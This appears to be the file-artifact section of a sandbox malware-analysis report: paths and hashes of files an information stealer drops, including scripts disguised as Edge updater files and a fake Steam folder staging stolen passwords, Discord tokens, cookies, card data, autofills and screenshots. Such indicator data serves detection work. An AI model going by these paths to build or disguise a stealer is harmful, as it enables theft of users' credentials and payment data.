SHA512 b99a12c3c46a3b4e5cd5ba65c933fbbff35d567ea182c0b3902479605898e21f3c245f7f50736f1d16f8449d251b1bdaefe5b3cc060902095a22b27334e4b385

C:\ProgramData\edge\Updater\Get-Clipboard.ps1

MD5 a8834c224450d76421d8e4a34b08691f
SHA1 73ed4011bc60ba616b7b81ff9c9cad82fb517c68
SHA256 817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5
SHA512 672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596

C:\ProgramData\edge\Updater\RunBatHidden.vbs

MD5 14a9867ec0265ebf974e440fcd67d837
SHA1 ae0e43c2daf4c913f5db17f4d9197f34ab52e254
SHA256 cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1
SHA512 36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54

C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat

MD5 e4f5fdd7337110185b947e52670ce84d
SHA1 bcba3cfbc5bec4343a69967ed80e544c0407f100
SHA256 6bbbe434a86a4362ddd74788722840582bb7bdf99eaab5db8f476625d75cd772
SHA512 336f5897f66a72881964b0d596e919066ba842a2c131f07ce0051bd466eaf68c7539e1ea37417883d067a35156bbbff60df037ffe1ba86a97ebfdf7084bdad5a

\??\c:\Users\Admin\AppData\Local\Temp\jsxxoqjq\jsxxoqjq.cmdline

MD5 ac3b98521c7e02ffa085ac0ffa2454cf
SHA1 9ea031d4adb3afa64ba4e319471f0656dc84a6c1
SHA256 aafc9159b94e1ee7b496361f6b4e8f7cbda6a51a5594ec2a2f0438f297941514
SHA512 bbce4e7bd7f11e7931bd5352b1cec3fdc0c844551a5ea4eedd6745f1f5fbd2501b34a1be56e129bdc04245c7b26bb1092f15c8d5aaecfeab56f10a62eec14e7a

\??\c:\Users\Admin\AppData\Local\Temp\jsxxoqjq\jsxxoqjq.0.cs

MD5 b462a7b0998b386a2047c941506f7c1b
SHA1 61e8aa007164305a51fa2f1cebaf3f8e60a6a59f
SHA256 a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35
SHA512 eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

\??\c:\Users\Admin\AppData\Local\Temp\jsxxoqjq\CSC5E3344A173974038A1E0272D1BF8B215.TMP

MD5 bdcdf1f83b09726dda14b1027a95d1cd
SHA1 fde20241e839610f61fee10fd4f3b3fed4f16d93
SHA256 9ffb69675bc277e28ea1ed0415bf8a77a7fb3de8db986e7f7a4272c21b28c02d
SHA512 5faf0d53b16440dd7d7359042c8d2bdf37f1f79aae4be1b100a4c215f5b3ecc10241a5b0aab4549ef9f88c7a94622707d56754837eb9f9827f1f26c5cea96211

C:\Users\Admin\AppData\Local\Temp\RES4508.tmp

MD5 3e8e9f2c18ea224f571fdaed3dd3ee49
SHA1 8f1a9c177f31e706ac3b736fa06d09eb2e4878c0
SHA256 df7df0d39c3b4d03217306793f8f819462bf6a9a48a703c0a416999d399ab0a6
SHA512 b2d91734ba09a7b2f20327afa87a3630196df1e26b041011fd628c718c40b885f83d6e53782a7bdf172a30162084bdce03696b91dc25d3b7d0196537c94bba5d

memory/1784-191-0x00000230FF620000-0x00000230FF628000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\jsxxoqjq\jsxxoqjq.dll

MD5 8621df3150a97462cfe2058a8d53730b
SHA1 589751968d505361a38d5cff9c98b0d3459e8faa
SHA256 cc84cb292112b8579838d722f0e63d20659976d527684b0a7c0518abbc87a6e3
SHA512 145d87a90533d09c74800c6a2329d47801ad17ec325dfb7c04a7a3f3a98ecfefe21cb4df580c257a91f9389ad90ab9ec97dc1cb4edc0f4801d04fe1b91f8f076

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8f07704f4a24121f36c4888d3ab67c85
SHA1 f0da922bbaca04b6796051bf750d80542adf9dfa
SHA256 e905f4d51db0f8013bc3d7ec610e4f998d4cdc42563948d85cee36b7cb762582
SHA512 7f7606c637bfbf8d873f89f044b943d00fc0ba4cca5e33b55e162a157397ba30fcafbf364ce81d1cd66a85c1fe06d4931819646e44dfa2a2c5e108f983034b2b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 34f595487e6bfd1d11c7de88ee50356a
SHA1 4caad088c15766cc0fa1f42009260e9a02f953bb
SHA256 0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d
SHA512 10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3d75098c0d683ab68bcad88feffc8407
SHA1 8ed6555a018df6970328138891555c55acc02f51
SHA256 dee25e8f5a0d340384eb982c3bfdf950d3ac5d1d56de89678a2acf456f7ac513
SHA512 448f050c76d7dbe77eda77b7ff9ce4bafc93215c648ec83c904af98fa5005e82fe10651a352d4cf074674ae6de3b2426d888b75cbf833768d3c379e5ad725391

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

C:\ProgramData\Steam\Launcher\EN-Llxdhewc\stolen_files.zip

MD5 76cdb2bad9582d23c1f6f4d868218d6c
SHA1 b04f3ee8f5e43fa3b162981b50bb72fe1acabb33
SHA256 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85
SHA512 5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

C:\ProgramData\Steam\Launcher\EN-Llxdhewc\Serial-Check.txt

MD5 f76a9d2bc8f58b92547d5f0acd7a7318
SHA1 5c8a6a5aba21123ba11a273627731c009830bca3
SHA256 8aea538a43e07b959e4c5bd93e27a119c4418031fcc5bc6fabc28dff4e1e2903
SHA512 c1a38f9e32f0e6a364f4504e3a3bf93298c78d5b826aee42af444321951b3380a1934d65f30dadccb7301cb831f2013c428299b0e639b78900ea846f217a3351

C:\ProgramData\Steam\Launcher\EN-Llxdhewc\Passwords\Passwords.txt

MD5 c5e74f3120dbbd446a527e785dfe6d66
SHA1 11997c2a53d19fd20916e49411c7a61bfb590e9c
SHA256 e0fd13d912d320faaa64e177b4e75f54ec140692ebc5904d10e1cbe3e811ee05
SHA512 a2bab776d22abf857c7df84b3c90851829eda615fbd450c9c72ab89f97591224380990a86c8e7e40ac811aa1225592743eebed63125d519d138fa28b859f2a3f

C:\ProgramData\Steam\Launcher\EN-Llxdhewc\Discord\discord.txt

MD5 675951f6d9d75fd2c9c06b5ff547c6fd
SHA1 9b474ab39d1e2aad52ea5272dbac7d4f9fe44c09
SHA256 60fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244
SHA512 44dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea

C:\ProgramData\Steam\Launcher\EN-Llxdhewc\debug.log

MD5 8b23d24f4f7b760312d0b19fc175bf2b
SHA1 2e5cbee1b8c2dac559a6acf48906a9141ab68dd5
SHA256 d7e932bdcc8fe47a442a281b37459797b68a47f88b19d383ac99576f8f34ea7d
SHA512 0c48cb6c88a5e2ec0d6e992d28015aa4001bf8eeb9a0479485a84ac09e91603ce1855228495925d149a04e142a6daf4a45c3ddc0a01b3a6c89e316dd20b665f2

C:\ProgramData\Steam\Launcher\EN-Llxdhewc\Cookies\Google_Default.txt

MD5 2ffb2630baa98fe54083de0417824a43
SHA1 c61ff825bfafa7cc542af941ec1c44fd82368e8c
SHA256 31775ab1612339763d80dddfd833142d534f8fbd4998aec0a7eb866f73396a28
SHA512 19542276006dfe89b87d81d15925c3d6fceb27d5b49612ff59d09ec3f866b206a89a75c82d8f79a678c9b80dad4aa773c79507ad2e56570138ec851047df3e29

C:\ProgramData\Steam\Launcher\EN-Llxdhewc\Cards\Cards.txt

MD5 8a0ed121ee275936bf62b33f840db290
SHA1 898770c85b05670ab1450a96ea6fbd46e6310ef6
SHA256 983f823e85d9e4e6849a1ed58e5e3464f3a4adbe9d0daeeadd1416cf35178709
SHA512 7d429ce5c04a2e049cdf3f8d8165a989ab7e3e0ac25a7809c12c4168076492b797d2eebaf271ae02c51cb69786c2574ec3125166444e4fa6fc73430f75f8f154

C:\ProgramData\Steam\Launcher\EN-Llxdhewc\Autofills\Autofills.txt

MD5 2f308e49fe62fbc51aa7a9b987a630fe
SHA1 1b9277da78babd9c5e248b66ba6ab16c77b97d0b
SHA256 d46a44dd86cea9187e6049fd56bb3b450c913756256b76b5253be9c3b043c521
SHA512 c3065baa302032012081480005f6871be27f26da758dc3b6e829ea8a3458e5c0a4740e408678f3ecf4600279d3fcad796f62f35b8591e46200ce896899573024

C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1

MD5 17103e27657428d243a5ce15b56d6fd3
SHA1 de29bb705e5f2a401651f59e91f5fa8e18f7adec
SHA256 898a545f58f25d6167535c9c52dc8a8ce01434aeb66272fe0d486b7655205329
SHA512 69215e1b35b428f5c09a04310a653edf8f7b7cb252268d8545af7b5ac8e1f7776ccd79fff3b250fc7e4d251ca6d8b91e3a13366a2ad3f3b9aba183c3a1f1e304

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ca24df1817fa1aa670674846e5d41614
SHA1 dac66ea013bcc46d24f1ece855568187c6080eaf
SHA256 3b9d5525002b14e4b5c044e80d3035420d037b48d94a1f836c5a253df0c539db
SHA512 fb1848fa381fa360171ba13e1aa15c7029ff543c806f34ae524f04bda637b48e1aa06e831843aa830173c0a218072da7f3d0bc52ce56364b888c53234a224631

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5caad758326454b5788ec35315c4c304
SHA1 3aef8dba8042662a7fcf97e51047dc636b4d4724
SHA256 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA512 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

C:\ProgramData\Steam\Launcher\EN-Llxdhewc\Screenshots\Screenshot.png

MD5 4df03b78dadff41e128680b9a0fa6f77
SHA1 32a951a0b3ad6312328410fe847bd4c52fc0e9b8
SHA256 b03e954caec1bfe16c958cd9183eb6489f7715e92342b75bac90781e0272adb8
SHA512 25b75b901b85d29a7e9a41c5d99469ee24995c642e6238b5898de006d2cc9f1a78790b62f068d6085fe6584520e5248e76a75f70c50c4a6dd1b5181177b1c556

C:\ProgramData\Steam\Launcher\EN-LLX~1.ZIP

MD5 c863916513a7332cb690c9bd46b34a26
SHA1 06ee0880ae4073260ab1a575619ded65b2c32aa2
SHA256 c5b142618205637f363fa7a7d5cfbef041e7f7df9c24ffa8e2b2e06920d51cdb
SHA512 3e3fd090410d92407f314f40c37f314ab716b9b1cdd3d340e48e1bc6712dea5754c89ca681d268d2959a7fc5f92bf9c20ceabfee9aaaadb5ae61ca9bb1aad811

C:\ProgramData\Steam\Launcher\EN-LLX~1\debug.log

MD5 d98208aa8b4716dc78668d73d4974765
SHA1 4d93e8bd3e6b9e75611f89a60cfe670f9650d411
SHA256 48474e3629529f17238c804dc9e88b1acd39bdfec2ada4512d628f24a80c8a9e
SHA512 5426b3ff37f17019c3bf63eb8c2124655ff110f317e684294650de3a2cbca9b6bbdcb9b351299c08e4b13915e94ab9d3ede36f437b6687d2f71df41ae4368517